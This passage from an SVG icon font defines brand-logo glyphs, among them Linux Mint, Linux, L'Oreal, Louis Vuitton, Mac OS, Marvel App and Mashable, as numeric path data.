2 0 3 0l1 0 2 0 1-1c1 0 2 0 3 0 9 0 19 3 26 9 6 4 11 9 14 16 3 6 5 14 5 22v70c0 0 0 1 0 1 2 1 2 1 2 2z m-23-36v-37c0-2-1-5-2-7-2-8-10-15-19-16 0 0-1 0-2 0l-2 0-1 1-2 0 0 0c-1 0-1 0-2 0h0c0 1 0 1 0 1-1 0-1 0-2 0 0 0 0 0 0 0-1 1-1 1-2 1l0 0c-1 1-1 1-2 1l0 1c-1 0-1 0-2 1l0 0c0 0-1 1-1 1l-1 0-1 2c0 0 0 0 0 0 0 0-1 1-1 2 0 0 0 0 0 0l-1 0c0 1 0 1 0 1 0 0 0 0 0 0l-1 2c0 0 0 1 0 1-1 0-1 1-1 1l0 1-1 2c0 0 0 0 0 0 0 0 0 1 0 2l0 0c0 1 0 2 0 2v18c0 6 2 12 6 16s10 6 17 6h22v-3z m-151 82h0 0z m0 0l-1 0c0 0 0 0 0 0h1z m53-47l-1 2 0 1v0c0 0 0 1 0 1v1c0 0 0 0 0 1v0l0 1v0l0 1v0c0 1 0 1-1 2v0l0 0c0 1 0 1 0 1 0 0 0 1 0 1v1c0 0 0 0 0 0l-1 3v0c0 0 0 0 0 0l-1 2 0 0c0 1 0 1 0 1l0 0-1 2c0 0 0 0 0 0 0 0 0 0 0 0-1 1-1 2-1 2 0 0 0 1-1 1 0 0 0 0 0 0l-1 2 0 0c0 1 0 1 0 1 0 0 0 0 0 0-1 0-1 1-1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1-1 1 0 0 0 0 0 0-1 1-1 2-2 3l-2 2 0 0c0 0 0 0 0 0-1 1-1 1-2 2 0 0 0 0 0 0l-2 2c0 0 0 0-1 1 0 0 0 0 0 0 0 0-1 1-2 1 0 0 0 0 0 0l-3 2c0 0 0 0 0 0 0 1-1 1-2 1l-1 1-2 1h0l0 0c-1 0-2 1-3 1 0 0 0 0 0 0 0 0 0 0-1 0 0 0-1 1-2 1l0 0 0 0-3 1c-1 0-1 0-1 0-1 0-1 0-2 0l-1 0h0c-1 0-2 0-2 0h-1c-1 0-2 0-3 0h0c-1 0-1 0-2 0 0 0 0 0 0 0h-1c0 0-1 0-1 0-1 0-1 0-1 0h0c0 0-1 0-1 0l-2-1h0c0 0 0 0 0 0-1 0-1 0-2 0 0 0 0 0-1 0h0c0 0-1 0-1 0l-2 0c0-1 0-1-1-1 0 0 0 0 0 0-1 0-1 0-1 0-1 0-1 0-1 0l-2-1 0 0s0 0 0 0c-1 0-1 0-2 0h0v70h-23v-231h23v138h23l2 0c0 0 1 0 1 0l1-1c1 0 1 0 1 0l2 0c0 0 0 0 0 0 1-1 1-1 2-1l0 0 2-1 0 0c1 0 1-1 2-1 0 0 0 0 0 0 1-1 1-1 2-1 0 0 0-1 0-1 0 0 1 0 1-1l1 0c0-1 0-1 1-1 0-1 0-1 0-1 0 0 1-1 1-1l1-1 0-1 1-1 0-1 1-1c0 0 0 0 0 0 0 0 0 0 0 0l0-1 0-1 1-1c0 0 0 0 0-1 0 0 0-1 0-1 0-1 0-1 0-1 0-1 0-1 0-2v-116h24v116c-1 0-1 1-1 1z m-121 4v1l0 0c0 1 0 2 0 2l0 1 0 2c0 0 0 0 0 1v0c0 0-1 0-1 0 0 0 0 1 0 1 0 1 0 1 0 1 0 0 0 0 0 0l0 1 0 1-1 0 0 1c0 1 0 1 0 1l-1 1 0 2c0 0 0 0-1 1 0 0 0 1 0 1 0 0 0 1 0 1 0 0-1 0-1 0l0 1c0 0 0 1-1 2l0 0-1 2c0 0 0 0 0 0l0 0c-1 1-1 1-1 2l-1 0c0 0 0 1 0 1-1 1-1 2-2 3 0 0 0 0-1 0l-1 1 0 1c0 0 0 0 0 0 0 0 0 0-1 0 0 1 0 1-1 1l0 1 0 0-1 1c0 0 0 0-1 0 0 1 0 1-1 1l0 1 0 0-2 1c0 0 0 0 0 0l0 1-2 1 0 0-2 1c0 0 0 0 0 0l-1 1c-1 0-1 0-1 0 0 0 0 0 0 0 0 0 0 0 0 0-1 1-1 1-1 1l-1 0c0 0 0 0 0 0 0 0 0 0 0 0-1 1-2 1-2 1 0 0 0 0-1 0 0 0 0 0 0 0s0 0 0 1h0c0 0-1 0-2 0 0 0 0 0 0 0-1 1-1 1-2 1 0 0 0 0 0 0-1 0-2 1-2 1l-1 0c0 0 0 0 0 0 0 0 0 0 0 0-1 0-1 0-2 0l0 0 0 1-2 0-2 0-1 0c-1 0-2 0-2 0l0 1h-1c0 0 0 0-1 0 0 0-1 0-1 0s-1 0-1 0h-2l-1 0h0c0 0-1-1-1-1h0l-2 0-1 0-1 0c-1 0-1 0-1 0l0 0-1-1-1 0c0 0 0 0 0 0 0 0 0 0 0 0l-1 0c0 0-1-1-1-1 0 0 0 0 0 0l-1 0 0 0-1-1c-1 0-1 0-1 0l-1 0h0l0 0c-1 0-1 0-1 0 0-1 0-1 0-1l-1 0 0 0-1-1c0 0 0 0-1 0l0 0-1-1-1 0 0 0-1-1c0 0-1 0-1 0l-1 0c0 0 0-1 0-1h0c0 0 0 0 0 0-1 0-1 0-1 0l-1 0c0-1 0-1 0-1-1 0-1 0-1 0l-1-1 0 0 0 0-1-1-1 0 0 0 0-1c0 0-1 0-1-1 0 0 0 0 0 0-1 0-1 0-1 0 0-1-1-1-1-1l0-1-1 0c0-1 0-1 0-1l-1 0 0 0c0-1-1-1-1-2l0 0-1 0c0-1 0-1 0-1 0 0-1-1-1-1l-1-1c0-1-1-2-1-3l-1 0c0 0 0 0 0 0l0-1c-1-1-1-1-1-2 0 0 0 0 0 0-1-1-1-1-1-1l0-1c-1 0-1-1-1-1l0-2-1-2c0 0-1 0-1-1 0 0 0 0 0 0l-1-3v0c-1-4-1-8-1-12v-70l0-3 0-1c0-1 0-1 0-2 0 0 0-1 0-1 0-1 1-2 1-3l0-1 0-2 1-1c0-1 0-1 0-2 1-1 1-1 1-1l0-2 1-1 1-3 0 0 1-2 0-1 1 0c0-1 0-1 1-2l0-1c1 0 1-1 2-2l0 0c0-1 1-2 1-2l1-1c0 0 1-1 1-1l1-1 1-1 0-1c1-1 2-1 2-2l1 0c1-1 1-1 2-1 0-1 0-1 0-1l2-1c0 0 0 0 1-1 0 0 1-1 2-1l0 0c1-1 1-1 2-1l1-1c1 0 1 0 2 0l1-1c0 0 1 0 2 0 0 0 0-1 0-1 1 0 2 0 3 0 0 0 0 0 1-1 0 0 1 0 2 0l1 0c1 0 1 0 2 0 0 0 1 0 1 0 1-1 2-1 3-1h0c1 0 2 1 4 1 1 0 2 0 4 0l30 5 3 0-1 18 0 10 0 1 0 2-1 0h-35c0 0-1 0-1 0l-1 1c0 0-1 0-1 0 0 0 0 0 0 0h-1c0 0 0 0-1 0 0 0 0 0 0 0-1 1-1 1-1 1 0 0 0 0-1 0l-1 1c0 0 0 0 0 0l-1 1c0 0 0 0 0 0-1 0-1 1-1 1l0 0c-1 1-1 1-1 1 0 0 0 1 0 1-1 0-1 0-1 1 0 0 0 0 0 0 0 0 0 0-1 1 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0l-1 1c0 1 0 1 0 1l0 1c0 0 0 0 0 0 0 1 0 1 0 1v16h47c10 0 18 8 18 19v35c0 0 0 0 0 0 0 1 0 2 0 2v0z m-36-19h-28v17c0 7 6 14 14 14h0c1 0 1 0 1-1l1 0c0 0 0 0 0 0 1 0 1 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0l1-1 0 0c1 0 1 0 1 0 0 0 0 0 1 0l0-1 1 0c0 0 0 0 0-1l1 0 0-1 1 0 0 0 1-1 0 0c0 0 0-1 0-1 0 0 1 0 1-1 0 0 0 0 0 0 0 0 0 0 0-1 1 0 1 0 1 0 0 0 0-1 0-1 0 0 0 0 0 0 0 0 0 0 0 0 0-1 0-1 0-1 0 0 0-1 0-1l0-1 1 0c0 0 0-1 0-1v-17z m-122 127l0 0c0 0 0 0 0 0z m-5-4l0 0 0 0c0 0 0 0 0 0z m48 7c0 0-1 1-1 1l-1 0 0 0 0 0-1 0c0 1 0 1 0 1 0 0-1 0-1 0h0c-1 0-1 0-1 0l-1 0h0l0 1c0 0 0 0-1 0l0 0 0 0c0 0 0 0 0 0-1 0-1 0-1 0l-1 0c0 0 0 1-1 1 0 0 0 0 0 0l0 0-1 0c0 0 0 0 0 0h0l-1 0c0 0-1 0-1 0h0c0 0-1 0-1 0 0 0 0 1 0 1-1 0-1 0-2 0h0l-1 0h-2c-1 0-2 0-3 0h0c0 0 0 0 0 0l-2-1c0 0 0 0-1 0 0 0-1 0-1 0l-1 0c-1 0-1 0-1 0l-1-1c-1 0-1 0-2 0l-1 0c0 0-1-1-2-1 0 0 0 0 0 0l-2-1c0 0 0 0-1 0s-1-1-1-1l-1 0c0 0-1-1-2-1l0 0-2-2c-1 0-1 0-1 0l0 0c0 0 0 0 0 0l-1 0c0-1 0-1-1-1l0-1c-1 0-2-1-2-1 0 0 0 0 0 0-1 0-1 0-1 0l0-1-1-1c0 0 0 0-1 0 0 0 0 0 0 0 0-1-1-1-2-2l0 0-1-1-1-1c0 0 0 0 0-1-1 0-1-1-2-1l0-1-1-1c0 0 0 0-1-1 0 0 0 0 0 0l0 0s0-1 0-1l-1-1 0 0c-1 0-1-1-1-1 0 0 0-1-1-2l0 0c0-1-1-1-1-2 0 0 0 0 0 0 0-1-1-1-1-1 0-1 0-1-1-2l0 0 0-1c0-1-1-1-1-2 0 0 0 0 0 0l0 0 0-1-1-1c0-1 0-1 0-1l0 0-1-2 0-1 0 0v0 0c0-1 0-2-1-3v0c0-1 0-2 0-3 0 0 0 0 0-1 0 0 0-1 0-2 0 0 0 0 0-1-1 0-1-1-1-2v-222l2 0 35 2v133h28v37h-27v49c0 8 6 14 14 14h17l1 32 0 1 0 2z m-189-1v-230h37v227l-35 2z m99-32l0 0v0l0 2v0c0 0 0 0 0 0 0 1 0 1 0 1l-1 1 0 0s0 1 0 1c0 0 0 0 0 0 0 1 0 1 0 1-1 0-1 1-1 1l0 1c0 0-1 0-1 0 0 1 0 1 0 1l0 0c-1 1-1 1-1 2l-1 0-1 1 0 0 0 0c0 1 0 1 0 1-1 0-1 0-1 0l0 1c-1 0-1 0-1 0 0 0-1 1-1 1 0 0 0 0 0 0 0 0-1 0-1 0 0 0 0 1 0 1l-1 0c0 0-1 0-1 0 0 0 0 0 0 0 0 1 0 1-1 1l-1 0 0 0c-1 0-1 0-1 0 0 1-1 1-1 1-1 0-1 0-1 0 0 0 0 0-1 0 0 0 0 0 0 0l-1 0h0c-1 0-1 0-2 0l-2 0-1 0-1 0-1 0-1-1h0c0 0 0 0-1 0l-1 0-1-1c0 0 0 0 0 0 0 0 0 0-1 0l0-1-1 0s0 0 0 0c-1 0-1-1-1-1l-1 0-1-1c0 0 0 0 0 0l0-1-1 0 0 0c0-1-1-1-1-1 0 0 0 0 0-1l0 0c-1 0-1 0-1 0 0 0 0 0 0-1l0 0c0 0-1 0-1 0 0-1 0-1 0-1 0 0 0 0 0 0 0-1 0-1-1-1 0 0 0 0 0 0l0-1 0-1c-1 0-1-1-1-1 0 0 0 0 0-1l0 0c0-1 0-1 0-1-1 0-1 0-1 0 0 0 0-1 0-1l0 0c0 0 0-1 0-1v0c0 0 0-1 0-1v0c0-1 0-1 0-2l0-2 0 0 0-2c0 0 0 0 1 0 0-1 0-1 0-2 0 0 0 0 0 0 0-1 1-1 1-2l0 0c0-1 0-1 1-2 0 0 0 0 0 0l0-1c1 0 1 0 1 0 0 0 0 0 0-1 0 0 1-1 1-1l0 0 1-1 1-1 1-1 0 0c1 0 1-1 1-1 1 0 1 0 1 0 0-1 1-1 1-1l1 0c0-1 1-1 1-1l0 0 2-1c0 0 0 0 0 0l2 0 2-1 1 0c0 0 1 0 1 0l3 0 0 0c0 0 1 1 2 1 0 0 0 0 0 0 1 0 1 0 1 0 1 0 1 0 1 0 0 1 1 1 1 1l1 0c0 0 1 1 1 1l1 0c0 0 0 1 1 1 0 0 0 0 0 0 1 0 1 1 1 1 1 0 1 0 1 0 0 1 0 1 1 1l0 1c1 0 1 0 1 1 0 0 0 0 1 0l0 1c0 0 1 1 1 1 0 0 0 0 0 1 0 0 0 0 1 1 0 0 0 0 0 1l0 0c1 1 1 1 1 1l0 1 0 1c1 1 1 1 1 1l0 1c0 1 0 1 0 1v1c0 0 0 1 0 1 0 1 0 2 0 3z m-39-33v-165h37v164l-37 2z" />
<glyph glyph-name="brand-linux-mint" horiz-adv-x="1000" unicode="&#xe8ff;" d="M650 797l-153 0-497 2v-333h116l0-235c0-182 157-330 350-330h534v566c0 182-157 330-350 330z m331-877h-515c-182 0-331 139-331 311l0 254h-116v295l478-2 153-1c182 0 331-139 331-310v-547z m-325 785h-152v0l-410 2v-148h63c44 0 52-30 52-72l0-261c0-135 118-244 264-244h361c46 0 87 29 87 74v404c-1 135-119 245-265 245z m146-580h0c-30-31-67-46-110-46h-275c-33 3-63 19-88 44-29 29-44 65-44 106v386h72v-372c0-50 34-88 74-88l247-1c51 0 91 35 91 77l0 198c0 12-4 22-13 32-9 9-19 13-32 13-13 0-22-4-31-13-10-10-14-20-14-32v-169h-76v169c0 12-4 22-14 32-9 9-18 13-31 13-13 0-22-4-32-13s-13-20-13-32v-169h-77v169c0 33 13 63 36 86 24 24 53 36 86 36 32 0 60-12 83-34 23 22 51 34 83 34 33 0 62-12 86-36s36-53 36-86l0-211c-4-36-19-67-44-93z" />
<glyph glyph-name="brand-linux" horiz-adv-x="1000" unicode="&#xe900;" d="M924 1c0 0-1-1-1-2 0-4-2-8-5-12-6-7-13-12-22-16-4-1-9-4-14-6-5-2-10-5-15-7-20-9-38-21-55-35-16-14-33-28-49-42-9-8-19-16-30-22-11-7-23-9-35-9-7 0-14 1-21 2-17 3-32 10-44 23-5 4-8 10-11 15-2 2-3 3-5 3l-27 3c-11 1-22 2-33 3-27 2-54 4-81 3-19-1-37-3-55-9-7-2-15-5-22-8-2 0-3-2-3-3-9-9-19-17-31-22-11-4-23-5-35-4-21 3-41 9-61 16-33 12-66 22-100 30-11 2-21 4-32 6-14 2-27 5-40 10-3 2-7 3-10 5-10 7-13 14-11 26 1 6 5 12 8 17 4 7 8 14 11 21 6 10 6 21 4 33-2 15-4 30-6 46-1 8 0 16 2 25 3 10 9 17 17 23 5 3 9 4 14 4 11 0 22 0 33 0 6 0 11 2 17 5 1 1 2 2 2 3 2 6 5 12 7 17 2 6 4 11 8 16-5 7-4 14-3 22 1 15 6 29 13 43 7 12 13 25 20 37 15 27 26 55 33 84 3 10 5 20 9 29 6 19 17 35 30 50 14 17 28 33 41 50 7 9 13 18 18 27 10 18 13 37 12 57-2 21-5 43-7 64-2 30-4 60-3 90 0 20 3 40 9 59 7 21 19 38 35 52 12 11 26 17 41 21 13 3 25 5 38 5 2 0 3 1 5 1h27l18-3c1-1 1 0 1 0 4-1 8-1 11-2 19-4 36-12 52-22 8-6 15-12 22-20 8-10 15-21 21-32 1 0 1-1 1-1 6-17 11-34 14-52 2-14 4-29 6-44 1-9 2-18 3-26 1-18 2-35 5-53l1-5c2-9 3-18 5-28 2-10 4-19 9-29 3-6 7-12 10-18 4-7 8-14 12-21 12-16 23-33 35-50 4-5 8-10 12-15 23-28 43-57 56-91 2-3 3-7 5-10 7-15 12-30 16-46 4-18 7-35 8-53 2-22 1-43-3-64-2-8-4-15-5-23 0 0 1-1 2-1 4 0 8-3 10-6 2-4 3-7 5-10 4-13 6-26 8-39 1-10 5-17 13-24 3-2 6-5 10-7 5-4 10-7 15-10 5-2 10-5 15-7 10-5 17-12 20-23l0-14z m-528 514c-1-5-1-10-3-14s-2-9-4-13c-3-9-7-17-12-25-7-14-15-28-20-43-3-10-6-19-8-28 0-5-1-9-3-13-9-19-18-37-28-55-11-23-21-46-28-70-7-25-11-51-7-78 0-1 0-1 0-2l-1 0c0 0-1 0-1 0-8 6-14 14-17 23-2 7-3 14-3 22 0 10 1 20 4 29 4 22 13 43 22 64 6 12 12 24 21 36 1 2 3 5 5 7 2 2 2 3 0 4-3 1-5 2-7 3-2-2-4-4-5-6-4-5-7-10-10-16-8-18-17-37-25-56-4-8-7-17-9-26-5-16-8-32-6-49 2-14 6-27 16-37 6-6 12-11 18-17 16-14 34-26 53-38 3-2 7-4 11-7 14-13 29-25 41-40 5-6 9-12 12-18 3-3 3-7 3-11 0-5-2-10-6-14-4-4-8-8-13-12-4-3-10-6-16-6 0 0-1 0-2-1 0-1 0-3 1-4 2-4 5-8 7-13 2-5 6-10 11-14 5-4 11-7 18-9 12-5 25-8 38-9 24-2 47 0 70 5 50 12 89 41 119 82 0 1 1 3 1 4 0 9 1 19-3 29 0 0 0 1 0 2 0 13 0 27 3 41 2 10 6 19 13 26 5 5 11 7 17 7 6 0 11-2 16-4 1-1 2-2 4-3 1 10 2 20 2 29 1 20 1 39 1 59 0 26-4 52-11 77-4 14-10 28-19 40-11 16-20 32-29 49 0 1-1 1-1 2-3 12-6 23-6 36 0 1-1 3-1 5-9 15-17 31-25 47-1 1-1 2-2 4l-16 38c-1 1-2 3-2 4-9-7-18-13-26-20-15-11-31-20-48-27-19-9-39-11-60-7-9 2-16 5-23 12-3 3-6 6-9 8-4 4-8 7-12 11z m-4-601c0 12-1 21-5 33-6 20-16 38-28 55-10 15-20 29-31 43-10 13-20 27-28 41-8 14-16 27-24 40-9 14-21 24-36 32-8 4-16 4-25 1-14-5-21-15-23-29-1-4-1-7-3-11-1-3-3-5-6-6-6-2-12-4-18-4-7-1-13 0-19-1-8 0-16-1-23-2-5-1-9-4-12-8-7-11-10-23-7-36 1-10 3-20 5-29 4-21 1-40-10-58-3-5-5-9-8-14-2-5-3-10-4-14-2-5 0-9 3-12 3-4 7-6 12-8 10-5 22-8 33-10 11-2 23-3 34-5 28-6 56-15 83-24 21-7 42-14 63-21 6-2 13-4 20-3 16 1 30 7 42 18 13 12 15 14 15 32z m437 217c-6 1-10-1-14-5-4-4-8-8-12-12-5-4-8-9-13-13-4-4-9-8-13-12-7-5-15-8-23-10-7-2-15-1-22-1-19 3-33 12-40 30-3 8-5 16-8 25-1 2-2 4-4 5-1 1-2 2-3 3-9 6-20 4-25-5-2-3-4-7-5-12-3-9-3-18-3-27 0-31-1-61 0-92 0-12-2-24-4-36-2-10-3-20-3-31 0-2 0-4 0-7l-6-30c0-2-1-4 1-6 12-21 30-33 54-35 10-1 19 0 29 3 6 2 13 4 19 9 2 1 4 3 7 5 3 2 7 4 11 7 9 8 19 16 28 24 10 9 21 18 31 27 14 11 29 19 45 27 10 6 20 11 31 14 6 2 11 5 16 9 1 1 2 1 3 2 8 13 8 25-3 37-7 6-15 11-23 15-3 1-6 2-8 3-12 8-22 18-27 31-3 8-6 16-7 24-1 9-4 18-6 27-1 3-2 5-3 7z m-274 435c-2-1-3-2-4-2-6-4-12-9-19-13-17-10-34-19-53-24-14-4-28-5-42-3-17 3-32 11-45 21-2 1-3 2-4 2 1-5 4-10 7-14 8-8 16-16 25-23 16-15 36-20 58-15 13 3 26 9 38 16 19 13 38 25 57 38 6 4 11 10 13 18 2 4 3 9-2 13-5 4-9 8-13 10-7 3-14 7-21 9-14 5-27 10-40 15-8 3-17 6-26 9-14 4-28 3-40-3-9-5-18-9-26-13-10-6-19-12-26-21-3-3-5-7-7-11-3-4-4-9 1-13 1-1 1-3 2-4 1-1 2-3 3-3 9-8 18-14 28-19 13-5 25-8 39-6 12 1 24 5 35 10 19 9 37 20 54 33 1 1 2 1 4 3l0-6 4-4z m16 30c1 5 2 10 3 15 3 17 5 33 3 50-1 8-3 16-7 23-2 3-3 5-5 7-16 14-42 14-59 1-1 0-1 0-1-1-5-6-9-12-10-20-1-16 2-31 8-45 2-4 6-6 10-6-1 3-1 6-2 9 0 6 0 12 0 18 1 5 2 11 5 16 6 7 13 12 22 12 10 0 17-7 23-13 0-1 0-1 1-2 1-4 3-8 4-13 2-7 2-14 1-21-2-9-7-16-16-19-1-1-1-1-2-2 1-2 3-2 5-3 5 0 8-1 12-4 1 0 3-1 5-2z m116-215c-3-3-3-3-3-7 2 0 3-1 5-2 17-8 30-21 38-39 12-26 14-53 12-81-2-21-7-41-15-61 0-2-2-4-4-5-15-7-25-20-33-34-1-2-1-4 1-5 2-2 3 0 4 2 5 6 11 12 16 18 6 7 15 11 24 13 7 1 14 0 21 0 14-1 28-5 40-11 6-2 11-6 14-11 3-6 8-10 10-16 0-2 2-3 3-2 1 0 2 2 2 3 0 6-2 12-6 17-6 9-14 16-24 20-14 6-28 8-42 9-4 0-9 0-14 1 1 2 1 4 2 6 10 32 14 65 10 99-2 24-11 45-26 63-9 11-20 20-35 23z m-251 245c1 0 2 0 2 0 1 3 4 6 4 10-1 9 0 18-1 27-1 11-7 20-16 27-11 9-30 6-38-9-8-16-11-33-8-50 1-13 8-23 17-32 3 2 6 4 9 6l-4 3c-5 4-8 8-10 14-3 10-3 19-1 29 1 7 5 13 11 17 12 9 22 2 28-7 2-7 4-15 6-22 1-4 1-9 1-13z m102 35c1-2 3-5 5-6 4-1 7-4 8-8 2-3 2-5 3-8h5c0 3-1 6-1 9 0 8-5 12-10 16-2 1-4 1-5 0-2-1-3-2-5-3z m-113-22c0 8-1 14-5 20-3 4-6 6-11 6l1-1-3-4-1 1v-6h9c1-5 3-11 4-16l6 0z" />
<glyph glyph-name="brand-lionix" horiz-adv-x="1000" unicode="&#xe901;" d="M1000 322c-2 126-42 237-128 330-25 26-52 44-88 45-56 1-112 2-168 0-30-1-59-9-88-14 78 48 163 66 254 73-52 26-103 54-157 66-117 27-91 39-176-56-22-25-40-53-60-79l-7 3c12 50 23 100 35 151-65-8-130-21-190-66 44-16 68-44 76-85 5-22 2-38-25-43-20-5-40-11-59-19-11-5-26-17-26-26-1-36-25-46-52-59-48-23-94-49-141-74l4-9c22-3 44-6 75-10-68-44-23-78 1-113 4-6 9-12 15-19 99 55 204 63 312 36l3 11c-48 23-96 46-147 70h159c-30 18-55 33-81 48 46 12 78 40 86 89 100-61 117-175 41-256-14-15-19-29-18-50 3-94-26-177-88-249-19-22-37-43-52-61 76 30 149 76 211 140 83 85 126 187 131 305 33-148 18-284-92-402 44 12 85 26 126 42 79 32 154 70 217 129 18 17 24 33 17 58-42 135-117 246-234 326-10 6-19 12-28 18 142-46 254-131 342-250z m-770 235l73 47c-16-55-16-55-73-47z m172-261c-40-14-75-25-113-38 49-62 55-111 17-151-15-17-40-35-60-35-34 0-68 13-108 22-54-50-81-147-61-236 53 42 107 86 161 128 61 47 115 99 148 170 19 43 29 87 16 140z m-60 25c-73 10-141 4-204-34-9-5-17-17-18-27-2-23-1-48-1-72l7-8c67 55 124 126 216 141z" />
<glyph glyph-name="brand-loreal" horiz-adv-x="1000" unicode="&#xe902;" d="M24 418h-24v-146h133v21h-109l0 125z m72-53h18l27 50h-25l-20-50z m200 62c-15 7-32 12-49 12s-34-5-49-12-28-20-36-33c-9-14-14-29-14-45s5-32 14-45c8-14 21-25 36-33s32-12 49-12 34 4 49 12c15 8 27 19 36 33 8 14 13 29 13 45s-5 31-13 45c-9 14-21 25-36 33z m15-114c-6-10-16-19-27-26s-24-9-37-9c-12 0-25 3-36 9-11 7-21 16-27 26-7 11-10 23-10 35 0 13 3 25 10 36 6 10 16 19 27 25 11 7 24 10 36 10 13 0 26-3 37-10 11-6 21-15 27-25s10-23 10-36c0-12-3-24-10-35z m182 24c7 3 15 8 19 18 4 9 5 23 1 33s-11 18-19 23c-9 5-19 7-29 7h-95v-146h24v58h58l45-58h27l-47 60c5 0 10 1 16 5z m-99 14v46h73c6 0 12-1 17-5s9-11 9-18c0-7-3-14-8-18-5-4-12-4-18-4h-73z m151-79h133v21h-109v43h81v19h-81v42h109v21h-133v-146z m71 169l-15-19 51 19h-36z m141-23l-75-146h24l19 37h87l19-37h24l-74 146h-24z m-22-90l34 66 34-66h-68z m156-35v125h-24v-146h133v21h-109z" />
<glyph glyph-name="brand-louis-vuitton" horiz-adv-x="1000" unicode="&#xe903;" d="M807 711l-260-613-71 157 132 361c10 28 45 40 104 40l20 55h-308l-20-55c44 0 62-12 55-40l-66-183-129 278c-24 30-12 45 35 45v65h-299v-65c56 0 91-15 106-45l218-466-102-273c-2-37-60-55-171-55l-21-55h852l118 252h-62c-57-130-124-197-199-197h-391l58 154 50-99h111l315 739c15 45 53 69 114 69v58h-257v-58c78 0 100-24 68-69z" />
<glyph glyph-name="brand-mac-os" horiz-adv-x="1000" unicode="&#xe904;" d="M564-38c-175 0-350 1-525-1-34 0-39 10-39 41 1 232 1 464 0 696 0 31 6 41 39 40 165-2 329-1 493-1-6-11-12-23-19-34-71-120-114-250-128-389-3-25-4-44 32-41 40 3 80 0 119 1 18 0 23-4 20-23-7-33-9-66-14-99-119-6-235 5-345 57-17 8-25 4-34-12-8-18 1-24 14-30 48-23 99-40 151-49 71-12 142-25 214-12 3-49 14-96 22-144z m-267 588h0c0 12 0 24 0 36 1 14-3 22-20 22-16 0-25-4-24-22 1-25 0-50 0-75 0-18 10-19 24-19 13 0 20 4 20 18 0 13 0 27 0 40z m296 189c122 0 244-2 366 0 32 0 41-9 41-41-1-233-1-466 0-699 0-31-10-38-39-37-115 1-229 0-344 0-15 37-19 76-24 116-3 23 4 29 28 31 73 5 142 22 207 57 13 7 20 14 9 27-8 9-8 28-28 16-60-34-126-45-193-55-26-4-31 7-28 27 7 36 13 73 25 108 10 30-1 32-25 31-43-1-85 1-127-1-21 0-28 6-25 27 20 143 71 276 157 393z m126-190c0 10 0 19 1 29 0 17 2 32-25 31-27-1-20-17-21-31 0-22 1-43 0-65-1-18 6-22 23-22 16 0 25 4 23 22-2 12-1 24-1 36z" />
<glyph glyph-name="brand-marvel-app" horiz-adv-x="1000" unicode="&#xe905;" d="M849 287c-364 29-665-61-733-93-38-18-41-40-36-52 5-10 22-15 42-4 145 78 438 141 726 123 14-1 21 25 1 26z m91 110c-16-18-38-31-46-24-7 7 1 27 1 27 35 22 105 82 105 128 0 43-37 56-78 17-28-27-53-76-68-125-21-21-53-48-82-48-16 0-20 11-19 26 26 1 95 21 95 79-1 25-21 35-39 35-31 0-71-33-91-78-5 1-10 2-15 6 6 14 10 26 12 35 3 23-6 39-26 38-12 0-27-11-30-38-3-18 6-38 6-38-8-27-42-61-54-61-11 1 2 50 13 86 8 7 14 16 15 23 3 12-1 18-5 20-9 7-32 5-46-19-3-6-8-16-12-28-10-11-25-27-29-25-8 5 14 34 12 51-3 16-15 24-28 22-19-3-44-42-44-42s5 12 5 22c-1 14-28 21-41-6-4-9-12-43-19-76-7-12-27-47-44-49-14-1 3 63 5 66 7 12 17 37 16 48-1 15-11 18-21 16-14-2-21-17-21-17s-8 12-26 10c-57-6-95-106-90-156 2-25 16-41 37-39 25 3 45 41 45 41s6-30 33-26c18 3 37 19 52 36-1-3-1-6-2-7-3-25 38-23 41-2 13 96 46 136 55 136 8 0-21-45-4-64 14-15 35-2 53 13-3-12-5-25-5-38-1-27 9-49 36-48 35 2 72 45 96 86 5-4 12-7 20-9-1-10-2-20-2-30 2-32 24-44 49-43 30 0 64 23 88 44l0-4c-2-15 0-43 22-45 25-3 69 23 90 51 16 20-3 38-15 23z m22 132c3 0 4-1 4-5 0-27-67-85-67-85s44 90 63 90z m-162-58c6 0 9-3 9-8 0-15-20-27-43-28 10 19 24 36 34 36z m-451-42c-2-16-30-89-45-90-20 0 10 105 41 104 6 0 6-5 4-14z m-246-20c19 0-14-98-10-140 3-43 51-31 48-6-5 42 23 173 51 173 20 0-22-90-14-148 6-39 56-25 51-2-17 75 35 147 29 198-3 23-16 34-30 34-47 0-84-97-84-97s4 55-33 57c-57 4-113-137-111-263 1-40 51-33 48-1-5 59 28 196 55 195z" />
<glyph glyph-name="brand-mashable" horiz-adv-x="1000" unicode="&#xe906;" d="M96 342l-35 93h-61v-168h44v112l43-112h19l42 112v-112h43v168h-60z m165 50c-19 0-40-5-56-19l15-26c10 8 22 13 34 13 15 0 24-8 24-18v-12c-7 9-21 14-37 14-19 0-42-10-42-39 0-27 23-40 42-40 15 0 30 6 37 15v-13h39v77c0 38-27 48-56 48z m17-93c-4-6-13-9-21-9-10 0-20 5-20 14s9 14 20 14c8 0 17-2 21-8v-11z m84 55c0 5 6 8 15 8 15 0 29-6 36-13l15 27c-13 10-31 16-51 16-34 0-52-18-52-40 0-49 70-33 70-48 0-6-4-9-16-9-14 0-34 8-43 16l-16-27c13-12 35-19 57-19 35 0 55 16 55 40 0 49-70 36-70 49z m156 38c-20 0-34-9-42-18v61h-39v-168h39v79c5 6 12 12 23 12 12 0 20-5 20-20v-71h39v87c0 23-12 38-40 38z m107 0c-18 0-39-5-55-19l15-26c10 8 21 13 33 13 16 0 24-8 24-18v-12c-6 9-21 14-37 14-18 0-41-10-41-39 0-27 22-40 41-40 16 0 31 6 37 15v-13h39v77c0 38-27 48-56 48z m17-93c-3-6-12-9-21-9-10 0-19 5-19 14s9 14 19 14c9 0 18-2 21-8v-11z m128 93c-13 0-27-5-36-17v60h-39v-168h39v15c9-12 23-17 36-17 30 0 54 22 54 64 0 39-23 63-54 63z m-12-93c-9 0-19 4-24 11v37c5 7 15 11 24 11 15 0 26-11 26-29 0-19-11-30-26-30z m71 136h39v-168h-39z m171-110c0 41-26 67-62 67-38 0-65-28-65-63 0-40 29-64 66-64 19 0 39 5 51 16l-17 25c-7-6-21-11-29-11-18 0-28 10-31 19h87v11z m-87 17c1 9 8 19 25 19 17 0 24-11 25-19h-50z" />
